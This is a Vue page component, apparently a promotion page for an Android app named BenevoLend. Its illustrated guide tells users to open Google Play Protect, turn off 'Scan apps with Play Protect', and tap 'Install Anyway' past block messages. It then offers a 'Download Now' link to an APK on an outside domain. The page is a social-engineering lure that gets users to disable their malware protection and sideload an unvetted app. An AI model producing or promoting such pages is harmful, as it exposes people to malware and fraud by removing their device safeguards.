 <style lang="less" scoped>
 .btn-container{
    position:fixed;
    width:670px;
    margin:0 auto;
    height:100px;
    line-height: 100px;
    text-align: center;
    font-size: 36px;
    color:#FF6AB7;
    bottom:50px;
    background:#333;
    left:40px;
    border-radius: 100px;;
 }
 .placholder{
    width: 100%;
    height: 150px;
 }
div.wrapper {
  div.guider-wrapper {
    div.guide-element {
      padding:0 0 40px 0 ;
      h2.guide-title {
        background:#333;
        padding:30px 50px;
        color:#fff;
        font-size: 36px;
      }

      p.guide-text {
        font-size: 30px;
        line-height: 2;
        padding:30px 50px;
      }

      div.img-guide {
        width:650px;
        margin:0 auto;
        img {
            width: 100%;
        }
      }
    }
  }
}
</style>
<template>
    <div class="wrapper">
        <div class="guider-wrapper">
            <div class="guide-element">
                <h2 class="guide-title"> Step 1: Open Google Play Store</h2>
                <p class="guide-text">
                    1.Find and open the Google Play Store on your phone.<br>
                    2.Tap your profile icon (or account icon) in the top right corner.<br>
                </p>
                <div class="img-guide">
                    <img src="../../assets/images/promotion/g2.png" alt="">
                </div>
            </div>
            <div class="guide-element">
                <h2 class="guide-title">
                    Setp 2: Turn Off Play Protect Scanning
                </h2>
                <p class="guide-text">
                    1.Select "Play Protect" from the menu.<br>
                    Tap the settings icon (gear button) in the top right corner.<br>                    
                </p>
                <div class="img-guide">
                    <img src="../../assets/images/promotion/g3.png" alt="">
                </div>
                <p class="guide-text">
                    2.Toggle off "Scan apps with Play Protect".<br>
                    Tap Turn Off to confirm.<br>
                </p>
                <div class="img-guide">
                    <img src="../../assets/images/promotion/g4.png" alt="">
                </div>
            </div>
            <div class="guide-element">
                <h2 class="guide-title">Step 3: Install the App</h2>
                <p class="guide-text">
                    1.Go back to the download page and tap Install APK again.<br>
                    If you see a block message, tap "Install Anyway".<br>
                </p>                
            </div>            
        </div>
        <a class="btn-container" href="https://download.bbposervices.com/apps/bbposervices/BenevoLend.apk">Download Now</a>
        <div class="placholder"></div>
    </div>
</template>
<style>
</style>